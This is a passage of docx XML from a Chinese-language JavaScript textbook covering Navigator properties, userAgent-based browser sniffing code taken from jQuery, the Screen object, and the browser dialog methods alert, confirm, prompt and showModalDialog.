        <w:t>字符串没有标准的格式，所以，没有办法直接用它来判断浏览器的类型。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>userAgent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>浏览器在它的</w:t>
      </w:r>
      <w:r>
        <w:t>USER-AGENTHTTP</w:t>
      </w:r>
      <w:r>
        <w:t>头部中发送的字符串。这个属性通常包含</w:t>
      </w:r>
      <w:r>
        <w:t>appVersion</w:t>
      </w:r>
      <w:r>
        <w:t>中的所有信息，并且常常也可能包含其他的细节。和</w:t>
      </w:r>
      <w:r>
        <w:t>appVersion</w:t>
      </w:r>
      <w:r>
        <w:t>一样，它也没有标准的格式。由于这个属性包含绝大部分信息，因此浏览器嗅探代码通常用它来嗅探。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>platfor</w:t>
      </w:r>
      <w:r>
        <w:t>m</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在其上运行浏览器的操作系统（并且可能是硬件）的字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Navigator</w:t>
      </w:r>
      <w:r>
        <w:t>属性的复杂性正说明了浏览器嗅探对于处理客户端兼容性问题是没有太大帮助的。在</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>的早期，人们写了大量的浏览器特定代码用于测试类似于</w:t>
      </w:r>
      <w:r>
        <w:t>navigator.appName</w:t>
      </w:r>
      <w:r>
        <w:t>的属性。在开发新浏览器的时候，浏览器厂商发现为了让现有网站显示正确，它们需要把</w:t>
      </w:r>
      <w:r>
        <w:t>appName</w:t>
      </w:r>
      <w:r>
        <w:t>设置为</w:t>
      </w:r>
      <w:r>
        <w:t>"Netscape"</w:t>
      </w:r>
      <w:r>
        <w:t>。类似的做法使得</w:t>
      </w:r>
      <w:r>
        <w:t>appVersion</w:t>
      </w:r>
      <w:r>
        <w:t>的起始数字失去了意义，而现在的浏览器嗅探代码必须要依赖于比之前复杂很多的</w:t>
      </w:r>
      <w:r>
        <w:t>navigator.userAgent</w:t>
      </w:r>
      <w:r>
        <w:t>字符串</w:t>
      </w:r>
      <w:r>
        <w:t>。例</w:t>
      </w:r>
      <w:r>
        <w:t>14-3</w:t>
      </w:r>
      <w:r>
        <w:t>展示了如何用正则表达式（摘自</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>）从</w:t>
      </w:r>
      <w:r>
        <w:t>navigator.userAgent</w:t>
      </w:r>
      <w:r>
        <w:t>中抽取浏览器名称和版本号的方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>14-3</w:t>
      </w:r>
      <w:r>
        <w:t>：使用</w:t>
      </w:r>
      <w:r>
        <w:t>navigator.userAgent</w:t>
      </w:r>
      <w:r>
        <w:t>来进行浏览器嗅探</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>为客户端嗅探定义</w:t>
      </w:r>
      <w:r>
        <w:t>browser.name</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>browser.version</w:t>
      </w:r>
      <w:r>
        <w:t>，这里使用了</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery 1.4.1</w:t>
      </w:r>
      <w:r>
        <w:t>中的代码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>//name</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>number</w:t>
      </w:r>
      <w:r>
        <w:t>都是字符串，对于不同的浏览器输出的结果也是不一样的，检测结果如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//"webkit":Safari</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>Chrome;</w:t>
      </w:r>
      <w:r>
        <w:t>版本号是</w:t>
      </w:r>
      <w:r>
        <w:t>Webkit</w:t>
      </w:r>
      <w:r>
        <w:t>的版本号</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//"o</w:t>
      </w:r>
      <w:r>
        <w:t>pera":Opera;</w:t>
      </w:r>
      <w:r>
        <w:t>版本号就是软件的版本号</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//"mozilla":Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>或者其他基于</w:t>
      </w:r>
      <w:r>
        <w:t>gecko</w:t>
      </w:r>
      <w:r>
        <w:t>内核的浏览器</w:t>
      </w:r>
      <w:r>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t>版本号是</w:t>
      </w:r>
      <w:r>
        <w:t>Gecko</w:t>
      </w:r>
      <w:r>
        <w:t>的版本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//"msie":IE;</w:t>
      </w:r>
      <w:r>
        <w:t>版本号就是软件的版本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>比如</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox 3.6</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>:{name:"mozilla",version:"1.9.2"}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var browser=(function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var s=navigator.userAgent.toLowerCase();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>match=/(webkit)[\/]([\w.]+)/.exec(s)||</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>/(opera)(?:.*version)?[\/]([\w.]+)/.exec(s)||</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>/(msie)([\w.]+)/.exec(s)||</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>!/compatible/.test(s)</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>/(mozilla)(?:.*?rv:([\w.]+))?/.exec(s)||</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>[];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return{name:match[1]||"",version:match[2]||"0"};</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除了浏览器厂商和版本信息的属性之外，</w:t>
      </w:r>
      <w:r>
        <w:t>Na</w:t>
      </w:r>
      <w:r>
        <w:t>vigator</w:t>
      </w:r>
      <w:r>
        <w:t>对象还包含一些杂项的属性和方法。以下是一些标准化的属性以及广泛应用但未标准化的属性：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>onLine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>navigator.onLine</w:t>
      </w:r>
      <w:r>
        <w:t>属性（如果存在的话）表示浏览器当前是否连接到网络。应用程序可能希望在离线状态下把状态保存在本地（用第</w:t>
      </w:r>
      <w:r>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:t>章的技术）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>geolocation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Geolocation</w:t>
      </w:r>
      <w:r>
        <w:t>对象定义用于确定用户地理位置信息的接口。参见</w:t>
      </w:r>
      <w:r>
        <w:t>22.1</w:t>
      </w:r>
      <w:r>
        <w:t>节的更多细节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>javaEnabled()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个非标准的方法，当浏览器可以运行</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>小程序时返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>cookieEnable()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>非标准的方法，如果浏览器可以保存永久的</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>时，返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。当</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>配置为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>视具体情况而定</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>时可能会返回不正确的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="343" w:name="14_4_2_ScreenDui_Xiang_"/>
      <w:r>
        <w:t>14.4.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>Screen</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:bookmarkEnd w:id="343"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>screen</w:t>
      </w:r>
      <w:r>
        <w:t>属性引用的是</w:t>
      </w:r>
      <w:r>
        <w:t>Screen</w:t>
      </w:r>
      <w:r>
        <w:t>对象。它提供有关窗口显示的大小和可用的颜色数量的信息。属性</w:t>
      </w:r>
      <w:r>
        <w:t>width</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>height</w:t>
      </w:r>
      <w:r>
        <w:t>指定的是以像素为单位的窗口大小。属性</w:t>
      </w:r>
      <w:r>
        <w:t>availWidth</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>availHeight</w:t>
      </w:r>
      <w:r>
        <w:t>指定的是实际可用的显示大小，它们排除了像桌面任务栏这样的特性所占用的空间。属性</w:t>
      </w:r>
      <w:r>
        <w:t>colorDepth</w:t>
      </w:r>
      <w:r>
        <w:t>指定的是显示的</w:t>
      </w:r>
      <w:r>
        <w:t>BPP</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>bits-p</w:t>
      </w:r>
      <w:r>
        <w:t>er-pixel</w:t>
      </w:r>
      <w:r>
        <w:t>）值，典型的值有</w:t>
      </w:r>
      <w:r>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>24</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>32</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>window.screen</w:t>
      </w:r>
      <w:r>
        <w:t>属性和它引用的</w:t>
      </w:r>
      <w:r>
        <w:t>Screen</w:t>
      </w:r>
      <w:r>
        <w:t>对象都是非标准但广泛实现的。可以用</w:t>
      </w:r>
      <w:r>
        <w:t>Screen</w:t>
      </w:r>
      <w:r>
        <w:t>对象来确定</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用是否运行在一个小屏幕</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>的设备上，比如上网本。如果屏幕空间有限，可能要选择用更小的字体和图片等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="344" w:name="14_5_Dui_Hua_Kuang_"/>
      <w:r>
        <w:t>14.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　对话框</w:t>
      </w:r>
      <w:bookmarkEnd w:id="344"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象提供了</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>个方法来向用户显示简单的对话框。</w:t>
      </w:r>
      <w:r>
        <w:t>alert()</w:t>
      </w:r>
      <w:r>
        <w:t>向用户显示一条消息并等待用户关闭对话框。</w:t>
      </w:r>
      <w:r>
        <w:t>confirm()</w:t>
      </w:r>
      <w:r>
        <w:t>也显示一条消息，要求用户单击</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>确定</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>取消</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>按钮，并返回一个布尔值。</w:t>
      </w:r>
      <w:r>
        <w:t>prompt()</w:t>
      </w:r>
      <w:r>
        <w:t>同样也显示一条消</w:t>
      </w:r>
      <w:r>
        <w:t>息，等待用户输入字符串，并返回那个字符串。下面的代码全用了这</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>种方法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>do{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var name=prompt("What is your name?");//</w:t>
      </w:r>
      <w:r>
        <w:t>得到一个字符串输入</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var correct=confirm("You entered'"+name+"'.\n"+//</w:t>
      </w:r>
      <w:r>
        <w:t>得到一个布尔值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"Click Okay to proceed or Cancel to re-enter.");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}while(!correct)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>alert("Hello,"+name);//</w:t>
      </w:r>
      <w:r>
        <w:t>输出一个纯文本消息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>尽管</w:t>
      </w:r>
      <w:r>
        <w:t>alert(</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>confirm()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>prompt()</w:t>
      </w:r>
      <w:r>
        <w:t>方法都很容易使用，但是良好的设计还是需要有节制地使用它们，要尽量做到这一点。像这样的对话框并非</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>的常见功能，大多数用户会发现这些对话框会破坏它们的浏览体验。如今，对这些方法唯一常见的应用就是调试：</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序员常常在代码中插入一个</w:t>
      </w:r>
      <w:r>
        <w:t>alert()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，用来查看某个变量的输出结果是什么。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意，这些对话框中显示的文本是纯文本，而不是</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>格式的文本。只能使用空格、换行符和各种标点符号来格式化这些对话框。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:t>confirm()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>prompt()</w:t>
      </w:r>
      <w:r>
        <w:t>都会产生阻</w:t>
      </w:r>
      <w:r>
        <w:t>塞，也就是说，在用户关掉它们所显示的对话框之前，它们不会返回。这就意味着在弹出一个对话框前，代码就会停止运行。如果当前正在载入文档，也会停止载入，直到用户用要求的输入进行响应为止。在大多数的浏览器里，</w:t>
      </w:r>
      <w:r>
        <w:t>alert()</w:t>
      </w:r>
      <w:r>
        <w:t>方法也会产生阻塞，并等待用户关闭对话框，但并不总是这样。完整细节请参考第四部分的</w:t>
      </w:r>
      <w:r>
        <w:t>Window.alert()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Window.confirm()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Window.prompt()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>除了</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>alert()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>confirm()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>prompt()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，还有个更复杂的方法</w:t>
      </w:r>
      <w:r>
        <w:t>showModalDi</w:t>
      </w:r>
      <w:r>
        <w:t>alog()</w:t>
      </w:r>
      <w:r>
        <w:t>，显示一个包含</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>格式的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>模态对话框</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
      <w:r>
        <w:t>，可以给它传入参数，以及从对话框里返回值。</w:t>
      </w:r>
      <w:r>
        <w:t>showModalDialog()</w:t>
      </w:r>
      <w:r>
        <w:t>在浏览器当前窗口中显示一个模态窗口。第一个参数用以指定提供对话框</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>内容的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>。第二个参数是一个任意值（数组和对象均可），这个值在对话框里的脚本中可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>window.dialogArguments</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值访问。第三个参数是一个非标准的列表，包含以分号隔开的</w:t>
      </w:r>
      <w:r>
        <w:t>name=value</w:t>
      </w:r>
      <w:r>
        <w:t>对，如果提供了这个参数，可以配置对</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>话框的尺寸或其他属性。用</w:t>
      </w:r>
      <w:r>
        <w:t>"dialogwidth"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"di</w:t>
      </w:r>
      <w:r>
        <w:t>alogheight"</w:t>
      </w:r>
      <w:r>
        <w:t>来设置对话框窗口的大小，用</w:t>
      </w:r>
      <w:r>
        <w:t>"resizable=yes"</w:t>
      </w:r>
      <w:r>
        <w:t>来允许用户改变窗口大小。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>用这个方法显示的窗口是</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>模态的</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>showModalDialog()</w:t>
      </w:r>
      <w:r>
        <w:t>这个方法直到窗口关闭之前不会返回。当窗口关闭后，</w:t>
      </w:r>
      <w:r>
        <w:t>window.returnValue</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值就是此方法返回的值。对话框的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>内容往往必须包含用来设置</w:t>
      </w:r>
      <w:r>
        <w:t>returnValue</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>确认</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>按钮，如果需要则调用</w:t>
      </w:r>
      <w:r>
        <w:t>window.close()</w:t>
      </w:r>
      <w:r>
        <w:t>（参见</w:t>
      </w:r>
      <w:r>
        <w:t>14.8.1</w:t>
      </w:r>
      <w:r>
        <w:t>节）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>14-4</w:t>
      </w:r>
      <w:r>
        <w:t>是一个适合用于</w:t>
      </w:r>
